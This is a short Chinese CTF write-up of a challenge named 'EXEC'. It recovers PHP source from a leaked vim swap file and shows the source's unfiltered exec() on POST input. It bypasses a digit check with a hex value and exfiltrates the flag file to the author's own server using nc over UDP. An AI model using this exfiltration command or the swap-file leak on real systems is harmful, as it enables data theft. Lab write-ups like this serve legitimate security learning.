i春秋-百度杯十月場-EXEC
進入網站,檢視原始碼,發現是用vim編輯,而抓包沒有有效資訊,加引數也無果。百度查了一下vim能形成什麼檔案。找到答案說,用vim編輯文字xxx.php中途退出,會自動建立一個檔案.xxx.php.swp。然後我們下載這個檔案。
用 vim -r 命令恢復檔案,得到原始碼:
<html>
<head>
<title>blind cmd exec</title>
<meta language='utf-8' editor='vim'>
</head>
</body>
<img src=pic.gif>
<?php
/*
flag in flag233.php
*/
function check($number)
{
$one = ord('1');
$nine = ord('9');
for ($i = 0; $i < strlen($number); $i++)
{
$digit = ord($number{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
return false;
}
}
return $number == '11259375';
}
if(isset($_GET[sign])&& check($_GET[sign])){
setcookie('auth','tcp tunnel is forbidden!');
if(isset($_POST['cmd'])){
$command=$_POST[cmd];
$result=exec($command);
//echo $result;
}
}else{
die('no sign');
}
?>
</body>
</html>
程式碼的意思大致是,引數sign必須是11259375,而且每一位的值的ascii碼不能大於1或小於9,只能試試16進位制了,成功繞過。
但是沒有echo,就算命令執行了也沒有結果返回,沒頭緒,參考了下別人的,哈哈。
最後,學到了nc 命令,以前看ctf題都不知道里邊的nc是幹啥用的,學到了學到了。
伺服器上執行,nc -u -l -p 55566
然後,cmd=nc -u ip地址 55566 < flag233.php